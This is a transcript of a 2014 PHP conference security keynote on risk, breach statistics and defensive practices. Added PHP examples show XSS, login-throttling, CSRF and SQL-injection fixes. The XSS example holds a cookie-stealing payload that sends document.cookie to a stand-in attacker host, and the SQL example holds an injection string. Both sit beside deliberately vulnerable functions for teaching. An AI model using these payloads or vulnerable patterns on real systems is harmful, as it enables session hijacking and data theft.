LonestarPHP 2014 Security Keynote
Keynote for LonestarPHP 2014

1. Alison Gianotto @snipeyhead

2. WHO AM I?
Alison Gianotto (aka "snipe")
• Former agency CTO/CSO
• Security & privacy advocate
• 20 years in IT and software development
• Co-author of a few PHP/MySQL books
• Survivor of more corporate audits than I care to remember
• @snipeyhead on Twitter
Lonestar PHP - April 2014 - #lsp14

3. WHAT SECURITY ISN'T
1 Bolted on: You don't add it on at the end.
2 Compliance: You can be compliant and not secure. Just ask Target.
3 A single person: Security is everyone's responsibility.
4 Outsourced: Throwing money at this problem won't work.

4. WHAT SECURITY ISN'T
5 An appliance: Firewalls and IDS are part of the solution, but not the end.
6 Silver bullet: There is no one thing. Defence in depth matters. Sort of.
7 Straightforward: Sometimes implementing security tools increases your attack surface.
8 Done: Security is where you start, not where you finish.

5. WHAT RISK ISN'T
1 Stifling: Managing risk doesn't have to hinder innovation.
2 Boring: Our job is finding creative solutions to problems. This is one more tool.
3 Avoidable: Risk isn't inherently bad. Not understanding your risk is.
4 One size: Acceptable risk to your company may not be the same as someone else's.

6. IT IS IMPOSSIBLE TO ANTICIPATE EVERY RISK.
Srsly.

7. DEFENSE IN DEPTH PROMISES
• Mitigates single points of failure. ("Bus factor")
• Requires more effort on the part of the attacker, theoretically exhausting attacker resources.
Except...

8. DEFENSE IN DEPTH PROBLEMS
• Larger, more complicated systems are harder to maintain.
• Leads to more cracks for bad guys to poke at.
• More surfaces that can be overlooked.
• The bad guys have nearly limitless resources. We don't.
• Attacks are commoditized now. Botnets for $2/hour.

9. CIA
Confidentiality, Integrity & Availability

10. CONFIDENTIALITY IS A SET OF RULES THAT LIMITS ACCESS TO INFORMATION.

11. CONFIDENTIALITY EXAMPLES
• Passwords. (boo!)
• Data encryption (at rest and in transmission).
• Two-factor authentication/biometrics. (Yay!)
• Corporate VPN
• IP whitelisting
• SSH keys

12. CONFIDENTIALITY RISKS
• No brute-force detection
• No vetting of how third-party vendors use/store customer data
• Information leakage from login messages (timing attacks, etc.)
• SQL injection
• Privilege escalation leading to admin access
• Passwords shared across websites
• Improper disposal/destruction of personal data
• Lost/stolen devices

13. INTEGRITY IS THE ASSURANCE THAT THE INFORMATION IS TRUSTWORTHY & ACCURATE.

14. INTEGRITY RISKS
• Data loss due to hardware failure (server crash!)
• Software bug that unintentionally deletes/modifies data
• Data alteration via authorized persons (human error)
• Data alteration via unauthorized persons (hackers)
• No backups, or no way to verify the integrity of the backups you have
• Third-party vendor with inadequate security
15. AVAILABILITY IS A GUARANTEE OF READY ACCESS TO THE INFO BY AUTHORIZED PEOPLE.

16. AVAILABILITY RISKS
• DDoS attacks
• Third-party service failures
• Hardware failures
• Software bugs
• Untested software patches
• Natural disasters
• Man-made disasters

17. THINK YOU'RE TOO SMALL TO BOTHER WITH?
Think again.

18. WHY HACK?
• To steal/sell identities, credit card numbers, corporate secrets, military secrets
• Fun, excitement and/or notoriety
• Political ("hacktivism")
• Revenge
• Blackhat SEO
• Extortion/ransomware

19. COMMON ATTACKS
• Reflected XSS
• Persistent XSS
• CSRF
• SQL injection
• Remote file inclusion
• Local file inclusion/directory traversal
• Hosting malware
• Defacement for SEO (pharma, etc.)
• Privilege escalation

20. WHY MEEEEEEEEEEEE??
• Users re-use passwords across websites
• Watering hole attack
• Low-hanging fruit
• Assumed fewer defenses
• To gain more information on users to execute spear-phishing attacks
• Because you are vulnerable. Period.

21. IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012.
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

22. (Diagram: a four-step attack chain)
1 Reflected XSS → 2 Social engineering → 3 XSS session hijack → 4 Pwned
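The chain on slide 22 in code, as an added PHP example that is not part of the keynote: a search page that reflects its query unescaped (step 1), the kind of link an attacker would social-engineer a victim into opening (step 2), the payload that lifts the session cookie (step 3), and the two controls that break the chain. The function names, the `attacker.example` host and the cookie settings are this example's own assumptions.

```php
<?php
// Added example (not from the keynote): the reflected-XSS -> session-hijack
// chain from the diagram, and the two controls that break it. Function
// names, the attacker host and the cookie settings are illustrative.

declare(strict_types=1);

// Step 1: a search page that reflects the query unescaped. Step 2 is the
// social engineering: the victim is sent a link whose q= parameter carries
// the payload below. Step 3: the injected script reads document.cookie and
// sends the session id to the attacker.
function renderSearchVulnerable(string $q): string
{
    return '<h1>Results for ' . $q . '</h1>';
}

// Fix for the XSS itself: encode on output for the HTML context it lands in.
// ENT_QUOTES also encodes single quotes, so the same helper is safe inside
// quoted attributes; the explicit charset avoids multibyte edge cases.
function renderSearchSafe(string $q): string
{
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h1>Results for ' . $safe . '</h1>';
}

// Second layer, independent of output encoding: an HttpOnly session cookie
// is not visible to document.cookie, Secure keeps it off plaintext HTTP and
// SameSite limits cross-site sending. Call before session_start(); the
// array form needs PHP 7.3 or newer.
function hardenSessionCookie(): bool
{
    return session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Crude check used only to show the difference between the two renderers.
function containsLiveScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed payload of the kind step 3 relies on (attacker.example is a
// placeholder host, not a real endpoint).
$payload = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

hardenSessionCookie();

// The raw script tag survives in the vulnerable output and is neutralised
// into &lt;script&gt; text in the safe one.
var_dump(containsLiveScriptTag(renderSearchVulnerable($payload)));
var_dump(containsLiveScriptTag(renderSearchSafe($payload)));
echo renderSearchSafe($payload), PHP_EOL;
```

Output encoding is the fix for the XSS; the cookie flags are the defence-in-depth layer from slide 7, because an HttpOnly cookie cannot be read by injected script, so the session-hijack step fails even where an encoding was missed. On PHP older than 7.3 the `samesite` key is not available in `session_set_cookie_params()`; set `session.cookie_httponly` and `session.cookie_secure` in php.ini instead.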
23. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

24. MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF >= 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.

25. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012. (+700%)
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

26. OCT 2013: ADOBE
Exposed: customer data, debit/credit card numbers, source code
Impacted: 152 million users
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

27. DEC 2013: TARGET
Exposed: customer data, debit/credit card numbers, PINs
Impacted: 110 million users
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

28. BREACH GROWTH
Data stolen:
• credit card info
• birth dates
• government ID numbers
• home addresses
• medical records
• phone numbers
• financial information
• email addresses
• login
• passwords
(Chart: Identities stolen by year, in millions. 2011: 232; 2013: 552.)
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

29. ATTACKS PER DAY
2011: 190,000
2012: 464,000
2013: 570,000
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014

30. APPSEC STRATEGY: PICK TWO
(Diagram: a "pick two" diagram whose three options all read "COMPLETELY BONED".)

31. CREATING A RISK MATRIX
Columns:
• Type
• Third-party
• Dataflow diagram ID
• Description
• Triggering action
• Consequence of service failure
• Risk of failure
• User impact
• Method used for monitoring this risk
• Efforts to mitigate in case of failure
• Contact info
Grab a starter template here! http://snipe.ly/risk_matrix

32. 29 THINGS YOU CAN START DOING TODAY.
Dooo eeeeeet.

33. 29 THINGS TO DO TODAY
1. Start every project risk-first.
2. Start using a risk matrix for every major project or product.
3. Build a clear inventory of surface areas and their value. Get stakeholders involved.
4. Make sure you understand what happens when third-party services fail or behave unexpectedly.

34. 29 THINGS TO DO TODAY
5. Trust your gut. If something doesn't look right, it probably isn't.
6. Keep your systems as simple as possible. Document them.
7. Favor self-documenting systems so that code, systems and docs don't fall out of sync.
8. Increased transparency reduces risk across departments. Consider devops.

35. 29 THINGS TO DO TODAY
9. Don't abstract code/systems if you don't have to. Premature optimization is the devil. Build light and refactor as needed.
10. Get to know your users' behavior. Use tools like Google Analytics and heat-mapping to understand what users do on your site. Be suspicious if it changes for no apparent reason.

36. 29 THINGS TO DO TODAY
11. Automate EVERYTHING (Chef, Vagrant, Ansible, Salt, Fabric, etc.)
12. Log (almost!) EVERYTHING. Know where your logs are. Use a central logging server if at all possible.
13. Always employ the principles of "least privilege."
14. Give preference to vendors that integrate with your AD/OD/LDAP.

37. 29 THINGS TO DO TODAY
15. Create a reliable data backup plan and TEST IT. (MORE THAN ONCE.)
16. Create a Business Continuity Plan.
17. Create an Incident Response Plan. Test it.
18. Create a Disaster Recovery Plan. TEST IT. (Seriously.)
19. Get your team to participate in at least one CTF every year.
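Item 15 above, together with the "no way to verify the integrity of the backups you have" risk on slide 14, in runnable form. This is an added PHP example and not part of the keynote: it records a SHA-256 manifest of a source tree and checks a restored copy against it. The temporary directory layout, file contents and function names are constructed for the example.

```php
<?php
// Added example (not from the keynote): a minimal backup manifest writer and
// verifier. Directory layout, file contents and function names are
// constructed for this demonstration.

declare(strict_types=1);

// Walk a directory and record the SHA-256 of every regular file, keyed by
// its path relative to $dir.
function buildManifest(string $dir): array
{
    $manifest = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->isFile()) {
            $rel = substr($file->getPathname(), strlen(rtrim($dir, '/')) + 1);
            $manifest[$rel] = hash_file('sha256', $file->getPathname());
        }
    }
    ksort($manifest);
    return $manifest;
}

// Compare a restored tree against the manifest. Returns a list of problems;
// an empty list means the restore matches what was backed up.
function verifyRestore(string $dir, array $manifest): array
{
    $problems = [];
    $actual = buildManifest($dir);
    foreach ($manifest as $rel => $expected) {
        if (!isset($actual[$rel])) {
            $problems[] = "missing: $rel";
        } elseif (!hash_equals($expected, $actual[$rel])) {
            $problems[] = "modified: $rel";
        }
    }
    foreach (array_diff_key($actual, $manifest) as $rel => $_) {
        $problems[] = "unexpected: $rel";
    }
    return $problems;
}

// Constructed demo: a source tree, its manifest, a faithful restore and a
// restore in which one file was altered.
$base = sys_get_temp_dir() . '/backup-demo-' . bin2hex(random_bytes(4));
mkdir("$base/src/etc", 0700, true);
mkdir("$base/restore-ok/etc", 0700, true);
mkdir("$base/restore-bad/etc", 0700, true);
file_put_contents("$base/src/etc/app.ini", "debug=0\n");
file_put_contents("$base/src/users.csv", "alice,admin\n");

$manifest = buildManifest("$base/src");
file_put_contents("$base/manifest.json", json_encode($manifest, JSON_PRETTY_PRINT));

copy("$base/src/etc/app.ini", "$base/restore-ok/etc/app.ini");
copy("$base/src/users.csv", "$base/restore-ok/users.csv");
copy("$base/src/etc/app.ini", "$base/restore-bad/etc/app.ini");
file_put_contents("$base/restore-bad/users.csv", "alice,admin\nmallory,admin\n"); // tampered

// The faithful restore yields no problems; the tampered one reports users.csv.
$stored = json_decode(file_get_contents("$base/manifest.json"), true);
print_r(verifyRestore("$base/restore-ok", $stored));
print_r(verifyRestore("$base/restore-bad", $stored));
```

Keep the manifest somewhere the backup job cannot overwrite (or sign it); a backup that is corrupted or tampered with at the source would otherwise carry a matching manifest along with it. Run the check against an actual restore onto separate storage rather than against the live tree, since the restore is the part of the plan the slide tells you to test.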
38. 29 THINGS TO DO TODAY
20. Strip specific messaging from login forms.
21. Use solid, salted password hashing like bcrypt.
22. Implement brute-force prevention for all login systems.
23. Encrypt everything, where feasible.
24. Only collect the data that you absolutely need.
25. Implement two-factor authentication. It's easier than you think.
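A login routine applying items 20 to 22 on this slide, added here as a PHP example and not taken from the keynote. It also addresses the "information leakage from login messages (timing attacks)" and "no brute-force detection" risks from slide 12. The user store and attempt counter are in-memory arrays so the script runs from the command line; the username, IP address, thresholds and function names are assumptions of this example, and a real deployment keeps the counter in the database or a cache shared by every web node.

```php
<?php
// Added example (not from the keynote): a login routine applying items 20-22
// (generic failure message, bcrypt, brute-force throttling). The user store,
// the attempt counter, thresholds and all names are illustrative; a real
// deployment keeps the counter in the database or a cache shared by every
// web node, not in a per-request array.

declare(strict_types=1);

const MAX_ATTEMPTS = 5;          // failures allowed per username+IP ...
const LOCKOUT_SECONDS = 900;     // ... within this window

// What the client sees on every failure, whatever the real cause (item 20).
const GENERIC_FAILURE = 'Invalid username or password.';

// Constructed user store: username => bcrypt hash. password_hash() generates
// and embeds the salt itself (item 21); do not build your own salting scheme
// on top of md5/sha1.
$users = [
    'alice' => password_hash('correct horse battery staple', PASSWORD_BCRYPT),
];

// Hash of a throwaway secret. A request for an unknown username is verified
// against this so it pays the same bcrypt cost as a real user; otherwise
// "no such user" answers in microseconds and "wrong password" in tens of
// milliseconds, and the timing alone enumerates valid usernames.
$dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_BCRYPT);

// Throttle state: key => [failure count, timestamp of first failure]
$attempts = [];

function throttleKey(string $username, string $ip): string
{
    return strtolower($username) . '|' . $ip;
}

function isLockedOut(array &$attempts, string $key, int $now): bool
{
    if (!isset($attempts[$key])) {
        return false;
    }
    [$count, $since] = $attempts[$key];
    if ($now - $since > LOCKOUT_SECONDS) {
        unset($attempts[$key]);      // window expired, start counting afresh
        return false;
    }
    return $count >= MAX_ATTEMPTS;
}

function recordFailure(array &$attempts, string $key, int $now): void
{
    if (!isset($attempts[$key])) {
        $attempts[$key] = [0, $now];
    }
    $attempts[$key][0]++;
}

// True only for a known user with the right password and no active lockout.
function login(array $users, string $dummyHash, array &$attempts,
               string $username, string $password, string $ip, int $now): bool
{
    $key = throttleKey($username, $ip);
    if (isLockedOut($attempts, $key, $now)) {
        return false;
    }
    // One bcrypt verification on both the known-user and unknown-user paths.
    $hash = $users[$username] ?? $dummyHash;
    $ok = password_verify($password, $hash) && isset($users[$username]);
    if (!$ok) {
        recordFailure($attempts, $key, $now);
        return false;
    }
    unset($attempts[$key]);          // success clears the counter
    return true;
}

// Constructed requests from one client address.
$ip  = '203.0.113.7';
$now = time();
$try = function (string $u, string $p) use ($users, $dummyHash, &$attempts, $ip, $now): void {
    $ok = login($users, $dummyHash, $attempts, $u, $p, $ip, $now);
    echo str_pad($u, 10), ' => ', $ok ? 'welcome' : GENERIC_FAILURE, PHP_EOL;
};
$try('alice', 'correct horse battery staple');   // succeeds
$try('alice', 'wrong');                           // fails, counter starts
$try('nobody', 'wrong');                          // fails with the same message and cost
for ($i = 0; $i < MAX_ATTEMPTS; $i++) {
    $try('alice', 'wrong');                       // pushes alice@ip past MAX_ATTEMPTS
}
$try('alice', 'correct horse battery staple');   // refused: locked out until the window expires
```

Keying the throttle on username plus source address means one attacker cannot lock a victim out from a single host, while a distributed attack against one account still has to get past the per-username portion of the key in your real store. The lockout check itself is cheap, so a locked-out account does answer faster than a live one; if that matters for your threat model, pay the bcrypt cost on that path as well.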
39. 29 THINGS TO DO TODAY
26. Suppress debugging and server information (PHP versions, Apache versions).
27. Leverage framework CSRF protection and data sanitization/validation.
28. Perform regular penetration tests and vulnerability assessments.
29. Become a passionate security ambassador for your users and co-workers.
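Item 27 says to take CSRF protection and validation from your framework; the following, added here as a PHP example and not code from the keynote, shows what those framework features do underneath: a per-session CSRF token compared in constant time, input validation as its own gate, and parameterised queries in place of string-built SQL (the SQL injection entry on slide 19). The session array standing in for `$_SESSION`, the SQLite schema, sample rows, payload and function names are this example's own assumptions.

```php
<?php
// Added example (not from the keynote): what a framework's CSRF protection
// and query binding do underneath. The session array, SQLite schema, sample
// rows, payload and function names are constructed for this example.

declare(strict_types=1);

// --- CSRF -------------------------------------------------------------------
// A random per-session token goes into every state-changing form as a hidden
// field; the handler rejects any POST whose token does not match. $session
// stands in for $_SESSION so the script runs from the command line.
function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="_token" value="' . $token . '">';
}

// hash_equals() compares in constant time, so the token cannot be recovered
// byte by byte from response timing.
function csrfValid(array &$session, array $post): bool
{
    return isset($session['csrf'], $post['_token'])
        && is_string($post['_token'])
        && hash_equals($session['csrf'], $post['_token']);
}

// --- Validation and SQL injection --------------------------------------------
// Validation is its own layer: reject anything that cannot be an email address
// before it gets near the database.
function isValidEmail(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// With pdo_mysql also set PDO::ATTR_EMULATE_PREPARES => false so parameters
// travel to the server separately from the statement text.
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, is_admin INTEGER)');
$pdo->exec("INSERT INTO users (email, is_admin) VALUES ('alice@example.com', 0), ('root@example.com', 1)");

// Vulnerable: the input is spliced into the SQL text and can change its grammar.
function findUserVulnerable(PDO $pdo, string $email): array
{
    $sql = "SELECT id, email FROM users WHERE email = '" . $email . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the input is bound as a value and is only ever compared, never parsed.
function findUserSafe(PDO $pdo, string $email): array
{
    $stmt = $pdo->prepare('SELECT id, email FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed injection payload: turns the WHERE clause into a tautology, so
// the vulnerable query returns every user and the safe one returns nobody.
$payload = "' OR '1'='1";
echo 'valid email? ', var_export(isValidEmail($payload), true), PHP_EOL;
echo 'vulnerable query returned ', count(findUserVulnerable($pdo, $payload)), ' row(s)', PHP_EOL;
echo 'safe query returned ', count(findUserSafe($pdo, $payload)), ' row(s)', PHP_EOL;

// CSRF round trip: the form's own token passes, a forged one of the same length fails.
$session = [];
echo csrfField($session), PHP_EOL;
var_dump(csrfValid($session, ['_token' => $session['csrf']]));
var_dump(csrfValid($session, ['_token' => str_repeat('0', 64)]));
```

Validation and parameterisation are separate controls: the first keeps junk out of your data, the second makes sure whatever does get through cannot change the query. For item 26 on the same slide, the corresponding settings are `expose_php = Off` and `display_errors = Off` in php.ini, and `ServerTokens Prod` with `ServerSignature Off` in the Apache configuration.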
40. CAPTURE ALL THE FLAGS!
• NotSoSecure CTF: http://cx.notsosecure.com
• Security Shepherd: https://www.owasp.org/index.php/OWASP_Security_Shepherd
• http://hax.tor.hu/
• https://pwn0.com/
• http://www.smashthestack.org/
• http://www.hellboundhackers.org/
• http://www.overthewire.org/wargames/
• http://counterhack.net/Counter_Hack/Challenges.html
• http://www.hackthissite.org/
• http://exploit-exercises.com/
• http://vulnhub.com/

41. THANK YOU!
Alison Gianotto (aka "snipe")
• @snipeyhead on Twitter
• snipe@snipe.net